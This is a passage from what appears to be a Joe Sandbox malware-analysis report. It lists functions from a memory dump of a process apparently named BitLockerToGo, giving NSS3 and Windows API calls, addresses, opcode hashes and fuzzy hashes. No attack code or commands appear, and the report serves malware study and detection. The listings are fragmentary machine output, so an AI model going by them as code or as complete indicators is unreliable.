                                                                                                                                                                                                                                                                                                                                                          • PR_Unlock.NSS3(?), ref: 6C75106B
                                                                                                                                                                                                                                                                                                                                                          • PR_Lock.NSS3 ref: 6C751079
                                                                                                                                                                                                                                                                                                                                                          • PR_Unlock.NSS3 ref: 6C751096
                                                                                                                                                                                                                                                                                                                                                          • free.MOZGLUE(?), ref: 6C7510A7
                                                                                                                                                                                                                                                                                                                                                          • free.MOZGLUE(?), ref: 6C7510B4
                                                                                                                                                                                                                                                                                                                                                          • PR_DestroyCondVar.NSS3(?), ref: 6C7510BF
                                                                                                                                                                                                                                                                                                                                                          • PR_DestroyCondVar.NSS3(?), ref: 6C7510CA
                                                                                                                                                                                                                                                                                                                                                          • PR_DestroyCondVar.NSS3(?), ref: 6C7510D5
                                                                                                                                                                                                                                                                                                                                                          • PR_DestroyCondVar.NSS3(?), ref: 6C7510E0
                                                                                                                                                                                                                                                                                                                                                          • PR_DestroyLock.NSS3(?), ref: 6C7510EB
                                                                                                                                                                                                                                                                                                                                                          • free.MOZGLUE(?), ref: 6C751105
                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000003.00000002.3382174438.000000006C5C1000.00000020.00000001.01000000.00000012.sdmp, Offset: 6C5C0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382145732.000000006C5C0000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382337030.000000006C75F000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382443708.000000006C79E000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382490179.000000006C79F000.00000008.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382556783.000000006C7A0000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382595893.000000006C7A5000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_6c5c0000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                          • API ID: Destroy$Cond$LockUnlockValuefree$CriticalErrorSection$EnterLeave
                                                                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                                                                          • API String ID: 8544004-0
                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: e8507fd271b796175c10bc6e876b391ad202e217f06ca77d391836a0360a288d
                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: c53376cfbfcd6193ff08378087c7101b9c8c57c76271a0c7d020addfe1091ae6
                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: e8507fd271b796175c10bc6e876b391ad202e217f06ca77d391836a0360a288d
                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 17318DB5900401BBEB02AF14FE45A45BBB1FF46359B584131E80942F61EB32F978DBDA
                                                                                                                                                                                                                                                                                                                                                          Function 6C5CDC60 Relevance: 21.3, APIs: 9, Strings: 3, Instructions: 282COMMON
                                                                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                          • memcpy.VCRUNTIME140(?,?,?), ref: 6C5CDD56
                                                                                                                                                                                                                                                                                                                                                          • memcpy.VCRUNTIME140(0000FFFE,?,?), ref: 6C5CDD7C
                                                                                                                                                                                                                                                                                                                                                          • _byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(00000000), ref: 6C5CDE67
                                                                                                                                                                                                                                                                                                                                                          • memcpy.VCRUNTIME140(0000FFFC,?,?), ref: 6C5CDEC4
                                                                                                                                                                                                                                                                                                                                                          • _byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6C5CDECD
                                                                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000003.00000002.3382174438.000000006C5C1000.00000020.00000001.01000000.00000012.sdmp, Offset: 6C5C0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382145732.000000006C5C0000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382337030.000000006C75F000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382443708.000000006C79E000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382490179.000000006C79F000.00000008.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382556783.000000006C7A0000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382595893.000000006C7A5000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_6c5c0000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                          • API ID: memcpy$_byteswap_ulong
                                                                                                                                                                                                                                                                                                                                                          • String ID: %s at line %d of [%.10s]$9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4$database corruption
                                                                                                                                                                                                                                                                                                                                                          • API String ID: 2339628231-598938438
                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: 2945245e453c5edce6112df78d99959bf9d8709a27eea43585604623e5f01394
                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: 61e79e1490e3ae978b67956d17ef30259aa819753393794c704413b259f0282a
                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 2945245e453c5edce6112df78d99959bf9d8709a27eea43585604623e5f01394
                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 2DA1D071B442059FC710DF69CC80A6AB7F5AF85308F19892DE889CBB51E734E945CBA2
                                                                                                                                                                                                                                                                                                                                                          Function 6C68EDD0 Relevance: 21.2, APIs: 14, Instructions: 239memoryCOMMON
                                                                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                          • PORT_Alloc_Util.NSS3(?), ref: 6C68EE0B
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C6A0BE0: malloc.MOZGLUE(6C698D2D,?,00000000,?), ref: 6C6A0BF8
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C6A0BE0: TlsGetValue.KERNEL32(6C698D2D,?,00000000,?), ref: 6C6A0C15
                                                                                                                                                                                                                                                                                                                                                          • PR_SetError.NSS3(FFFFE013,00000000), ref: 6C68EEE1
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C681D50: TlsGetValue.KERNEL32(00000000,-00000018), ref: 6C681D7E
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C681D50: EnterCriticalSection.KERNEL32(?), ref: 6C681D8E
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C681D50: PR_Unlock.NSS3(?), ref: 6C681DD3
                                                                                                                                                                                                                                                                                                                                                          • TlsGetValue.KERNEL32 ref: 6C68EE51
                                                                                                                                                                                                                                                                                                                                                          • EnterCriticalSection.KERNEL32(?), ref: 6C68EE65
                                                                                                                                                                                                                                                                                                                                                          • PR_Unlock.NSS3(?), ref: 6C68EEA2
                                                                                                                                                                                                                                                                                                                                                          • free.MOZGLUE(?), ref: 6C68EEBB
                                                                                                                                                                                                                                                                                                                                                          • PR_SetError.NSS3(00000000,00000000), ref: 6C68EED0
                                                                                                                                                                                                                                                                                                                                                          • PR_Unlock.NSS3(?), ref: 6C68EF48
                                                                                                                                                                                                                                                                                                                                                          • free.MOZGLUE(?), ref: 6C68EF68
                                                                                                                                                                                                                                                                                                                                                          • PR_SetError.NSS3(00000000,00000000), ref: 6C68EF7D
                                                                                                                                                                                                                                                                                                                                                          • PK11_DoesMechanism.NSS3(?,?), ref: 6C68EFA4
                                                                                                                                                                                                                                                                                                                                                          • free.MOZGLUE(?), ref: 6C68EFDA
                                                                                                                                                                                                                                                                                                                                                          • PR_SetError.NSS3(FFFFE040,00000000), ref: 6C68F055
                                                                                                                                                                                                                                                                                                                                                          • free.MOZGLUE(?), ref: 6C68F060
                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000003.00000002.3382174438.000000006C5C1000.00000020.00000001.01000000.00000012.sdmp, Offset: 6C5C0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382145732.000000006C5C0000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382337030.000000006C75F000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382443708.000000006C79E000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382490179.000000006C79F000.00000008.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382556783.000000006C7A0000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382595893.000000006C7A5000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_6c5c0000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                          • API ID: Errorfree$UnlockValue$CriticalEnterSection$Alloc_DoesK11_MechanismUtilmalloc
                                                                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                                                                          • API String ID: 2524771861-0
                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: 91d32b3410c6bb3ce8cfecedbd24afed756415c373c771cd806383cc5b6205af
                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: 788e81fc783ec32c60463a23ce0ffba029711f1eedda6f2ab764710beb8283b5
                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 91d32b3410c6bb3ce8cfecedbd24afed756415c373c771cd806383cc5b6205af
                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 3F818EB5A01209AFDF00DFA5DC85ADE7BB5BF49308F140024E919A7711E731E925CBB9
                                                                                                                                                                                                                                                                                                                                                          Function 6C654CF0 Relevance: 21.2, APIs: 14, Instructions: 237memoryCOMMON
                                                                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                          • PK11_SignatureLen.NSS3(?), ref: 6C654D80
                                                                                                                                                                                                                                                                                                                                                          • PORT_Alloc_Util.NSS3(00000000), ref: 6C654D95
                                                                                                                                                                                                                                                                                                                                                          • PORT_NewArena_Util.NSS3(00000800), ref: 6C654DF2
                                                                                                                                                                                                                                                                                                                                                          • PR_SetError.NSS3(FFFFE005,00000000), ref: 6C654E2C
                                                                                                                                                                                                                                                                                                                                                          • PR_SetError.NSS3(FFFFE028,00000000), ref: 6C654E43
                                                                                                                                                                                                                                                                                                                                                          • PORT_NewArena_Util.NSS3(00000800), ref: 6C654E58
                                                                                                                                                                                                                                                                                                                                                          • SGN_CreateDigestInfo_Util.NSS3(00000001,?,?), ref: 6C654E85
                                                                                                                                                                                                                                                                                                                                                          • DER_Encode_Util.NSS3(?,?,6C7A05A4,00000000), ref: 6C654EA7
                                                                                                                                                                                                                                                                                                                                                          • PK11_SignWithMechanism.NSS3(?,-00000001,00000000,?,?), ref: 6C654F17
                                                                                                                                                                                                                                                                                                                                                          • DSAU_EncodeDerSigWithLen.NSS3(?,?,?), ref: 6C654F45
                                                                                                                                                                                                                                                                                                                                                          • SECITEM_ZfreeItem_Util.NSS3(?,00000000), ref: 6C654F62
                                                                                                                                                                                                                                                                                                                                                          • PORT_FreeArena_Util.NSS3(?,00000001), ref: 6C654F7A
                                                                                                                                                                                                                                                                                                                                                          • PORT_FreeArena_Util.NSS3(00000000,00000000), ref: 6C654F89
                                                                                                                                                                                                                                                                                                                                                          • SECITEM_ZfreeItem_Util.NSS3(?,00000000), ref: 6C654FC8
                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000003.00000002.3382174438.000000006C5C1000.00000020.00000001.01000000.00000012.sdmp, Offset: 6C5C0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382145732.000000006C5C0000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382337030.000000006C75F000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382443708.000000006C79E000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382490179.000000006C79F000.00000008.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382556783.000000006C7A0000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382595893.000000006C7A5000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_6c5c0000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                          • API ID: Util$Arena_$ErrorFreeItem_K11_WithZfree$Alloc_CreateDigestEncodeEncode_Info_MechanismSignSignature
                                                                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                                                                          • API String ID: 2843999940-0
                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: 141480161fc60a8c28cdafb3375c75c9d6ef24462f067864c94568a494f44d8a
                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: c4241de18bbeb09ab33c6a3ce3631ce252137b77dc86844433d24581bb7a420f
                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 141480161fc60a8c28cdafb3375c75c9d6ef24462f067864c94568a494f44d8a
                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: DA81D4716083019FE701CF28D840BABB7E4AFC5308F64856DF959DB640E771E925CB9A
                                                                                                                                                                                                                                                                                                                                                          Function 6C695C10 Relevance: 21.2, APIs: 10, Strings: 2, Instructions: 221COMMON
                                                                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                          • SECMOD_DestroyModule.NSS3(00000000,?,?,?,?,?), ref: 6C695C9B
                                                                                                                                                                                                                                                                                                                                                          • PR_SetError.NSS3(FFFFE043,00000000,?,?,?,?,?), ref: 6C695CF4
                                                                                                                                                                                                                                                                                                                                                          • SECMOD_DestroyModule.NSS3(00000000,?,?,?,?,?,?,?), ref: 6C695CFD
                                                                                                                                                                                                                                                                                                                                                          • PR_smprintf.NSS3(tokens=[0x%x=<%s>],00000004,00000000,?,?,?,?,?,?), ref: 6C695D42
                                                                                                                                                                                                                                                                                                                                                          • free.MOZGLUE(00000000,?,?,?,?,?,?,?,?,?), ref: 6C695D4E
                                                                                                                                                                                                                                                                                                                                                          • free.MOZGLUE(?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C695D78
                                                                                                                                                                                                                                                                                                                                                          • PR_SetError.NSS3(FFFFE013,00000000,?,?,?,?,?,?,?,?,?,?), ref: 6C695E18
                                                                                                                                                                                                                                                                                                                                                          • TlsGetValue.KERNEL32 ref: 6C695E5E
                                                                                                                                                                                                                                                                                                                                                          • EnterCriticalSection.KERNEL32(?), ref: 6C695E72
                                                                                                                                                                                                                                                                                                                                                          • PR_Unlock.NSS3(?), ref: 6C695E8B
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C68F820: free.MOZGLUE(6A1B7500,2404110F,?,?), ref: 6C68F854
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C68F820: free.MOZGLUE(FFD3F9E8,2404110F,?,?), ref: 6C68F868
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C68F820: DeleteCriticalSection.KERNEL32(04C4841B,2404110F,?,?), ref: 6C68F882
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C68F820: free.MOZGLUE(04C483FF,?,?), ref: 6C68F889
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C68F820: DeleteCriticalSection.KERNEL32(CCCCCCDF,2404110F,?,?), ref: 6C68F8A4
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C68F820: free.MOZGLUE(CCCCCCC3,?,?), ref: 6C68F8AB
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C68F820: DeleteCriticalSection.KERNEL32(280F1108,2404110F,?,?), ref: 6C68F8C9
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C68F820: free.MOZGLUE(280F10EC,?,?), ref: 6C68F8D0
                                                                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000003.00000002.3382174438.000000006C5C1000.00000020.00000001.01000000.00000012.sdmp, Offset: 6C5C0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382145732.000000006C5C0000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382337030.000000006C75F000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382443708.000000006C79E000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382490179.000000006C79F000.00000008.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382556783.000000006C7A0000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382595893.000000006C7A5000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_6c5c0000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                          • API ID: free$CriticalSection$Delete$DestroyErrorModule$EnterR_smprintfUnlockValue
                                                                                                                                                                                                                                                                                                                                                          • String ID: d$tokens=[0x%x=<%s>]
                                                                                                                                                                                                                                                                                                                                                          • API String ID: 2028831712-1373489631
                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: 9c8c8ee9ce2c0d61dcfaaab5b9668b47771eebebc4970a862a03f0d1025ac868
                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: a7e8581d6baf3e5b0f56170ef5e437a2fa496f82cda2e2cb9d5d4177ce144252
                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 9c8c8ee9ce2c0d61dcfaaab5b9668b47771eebebc4970a862a03f0d1025ac868
                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: F371F8F0A051069BEB009F25ED4576E3375AF4531EF140135EC099AB52EB32E91AC79E
                                                                                                                                                                                                                                                                                                                                                          Function 6C688F40 Relevance: 21.2, APIs: 14, Instructions: 179memoryCOMMON
                                                                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                          • SECOID_GetAlgorithmTag_Util.NSS3(6C689582), ref: 6C688F5B
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C69BE30: SECOID_FindOID_Util.NSS3(6C65311B,00000000,?,6C65311B,?), ref: 6C69BE44
                                                                                                                                                                                                                                                                                                                                                          • PORT_NewArena_Util.NSS3(00000800), ref: 6C688F6A
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C6A0FF0: calloc.MOZGLUE(00000001,00000024,00000000,?,?,6C6487ED,00000800,6C63EF74,00000000), ref: 6C6A1000
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C6A0FF0: PR_NewLock.NSS3(?,00000800,6C63EF74,00000000), ref: 6C6A1016
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C6A0FF0: PL_InitArenaPool.NSS3(00000000,security,6C6487ED,00000008,?,00000800,6C63EF74,00000000), ref: 6C6A102B
                                                                                                                                                                                                                                                                                                                                                          • SECOID_FindOIDByTag_Util.NSS3(00000000), ref: 6C688FC3
                                                                                                                                                                                                                                                                                                                                                          • PK11_GetIVLength.NSS3(-00000001), ref: 6C688FE0
                                                                                                                                                                                                                                                                                                                                                          • SEC_ASN1DecodeItem_Util.NSS3(?,?,6C76D820,6C689576), ref: 6C688FF9
                                                                                                                                                                                                                                                                                                                                                          • DER_GetInteger_Util.NSS3(?), ref: 6C68901D
                                                                                                                                                                                                                                                                                                                                                          • PORT_ZAlloc_Util.NSS3(?), ref: 6C68903E
                                                                                                                                                                                                                                                                                                                                                          • SECOID_GetAlgorithmTag_Util.NSS3(?), ref: 6C689062
                                                                                                                                                                                                                                                                                                                                                          • memcpy.VCRUNTIME140(00000024,?,?), ref: 6C6890A2
                                                                                                                                                                                                                                                                                                                                                          • PORT_ZAlloc_Util.NSS3(?), ref: 6C6890CA
                                                                                                                                                                                                                                                                                                                                                          • memcpy.VCRUNTIME140(00000018,?,?), ref: 6C6890F0
                                                                                                                                                                                                                                                                                                                                                          • PR_SetError.NSS3(FFFFE006,00000000), ref: 6C68912D
                                                                                                                                                                                                                                                                                                                                                          • free.MOZGLUE(00000000), ref: 6C689136
                                                                                                                                                                                                                                                                                                                                                          • PORT_FreeArena_Util.NSS3(?,00000001), ref: 6C689145
                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000003.00000002.3382174438.000000006C5C1000.00000020.00000001.01000000.00000012.sdmp, Offset: 6C5C0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382145732.000000006C5C0000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382337030.000000006C75F000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382443708.000000006C79E000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382490179.000000006C79F000.00000008.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382556783.000000006C7A0000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382595893.000000006C7A5000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_6c5c0000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                          • API ID: Util$Tag_$AlgorithmAlloc_Arena_Findmemcpy$ArenaDecodeErrorFreeInitInteger_Item_K11_LengthLockPoolcallocfree
                                                                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                                                                          • API String ID: 3626836424-0
                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: 9b5357d97fb038e5a78cc682d23c079eab4dfb5f14bedd52b86112390a48fb31
                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: b1a7cd57a3c255848244810de183d1b61aeb66b4668b20c3daf989d02d383f97
                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 9b5357d97fb038e5a78cc682d23c079eab4dfb5f14bedd52b86112390a48fb31
                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: AB5102B2A092009BEB00CF29DC40B9BB7E9EF99358F044529EC5597701E731E945CBEA
                                                                                                                                                                                                                                                                                                                                                          Function 6C754960 Relevance: 21.1, APIs: 14, Instructions: 121COMMON
                                                                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                          • malloc.MOZGLUE(00000004,?,6C758061,?,?,?,?), ref: 6C75497D
                                                                                                                                                                                                                                                                                                                                                          • OpenSemaphoreA.KERNEL32(00100002,00000000,?), ref: 6C75499E
                                                                                                                                                                                                                                                                                                                                                          • GetLastError.KERNEL32(?,?,6C758061,?,?,?,?), ref: 6C7549AC
                                                                                                                                                                                                                                                                                                                                                          • PR_SetError.NSS3(FFFFE8C2,0000007B,?,?,6C758061,?,?,?,?), ref: 6C7549C2
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C6EC2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6C6EC2BF
                                                                                                                                                                                                                                                                                                                                                          • PR_SetError.NSS3(FFFFE890,00000000,?,?,6C758061,?,?,?,?), ref: 6C7549D6
                                                                                                                                                                                                                                                                                                                                                          • CreateSemaphoreA.KERNEL32(00000000,6C758061,7FFFFFFF,?), ref: 6C754A19
                                                                                                                                                                                                                                                                                                                                                          • GetLastError.KERNEL32(?,?,?,?,6C758061,?,?,?,?), ref: 6C754A30
                                                                                                                                                                                                                                                                                                                                                          • PR_SetError.NSS3(FFFFE8C9,000000B7,?,?,?,?,6C758061,?,?,?,?), ref: 6C754A49
                                                                                                                                                                                                                                                                                                                                                          • CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,6C758061,?,?,?,?), ref: 6C754A52
                                                                                                                                                                                                                                                                                                                                                          • GetLastError.KERNEL32(?,?,?,?,6C758061,?,?,?,?), ref: 6C754A5A
                                                                                                                                                                                                                                                                                                                                                          • free.MOZGLUE(00000000,?,?,?,?,?,6C758061,?,?,?,?), ref: 6C754A6A
                                                                                                                                                                                                                                                                                                                                                          • CreateSemaphoreA.KERNEL32(?,6C758061,7FFFFFFF,?), ref: 6C754A9A
                                                                                                                                                                                                                                                                                                                                                          • free.MOZGLUE(?,?,?,?,?,6C758061,?,?,?,?), ref: 6C754AAE
                                                                                                                                                                                                                                                                                                                                                          • free.MOZGLUE(?,?,?,?,?,6C758061,?,?,?,?), ref: 6C754AC2
                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000003.00000002.3382174438.000000006C5C1000.00000020.00000001.01000000.00000012.sdmp, Offset: 6C5C0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382145732.000000006C5C0000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382337030.000000006C75F000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382443708.000000006C79E000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382490179.000000006C79F000.00000008.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382556783.000000006C7A0000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382595893.000000006C7A5000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_6c5c0000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                          • API ID: Error$LastSemaphorefree$Create$CloseHandleOpenValuemalloc
                                                                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                                                                          • API String ID: 2092618053-0
                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: c2de8b6fc1779ad735127e460cecd4d97a8d809f92ebc16f55ca6fff6c94c5f6
                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: 1ae21ba073f77db305b1a7e22536504c91d98a34753956200464e3e98648c794
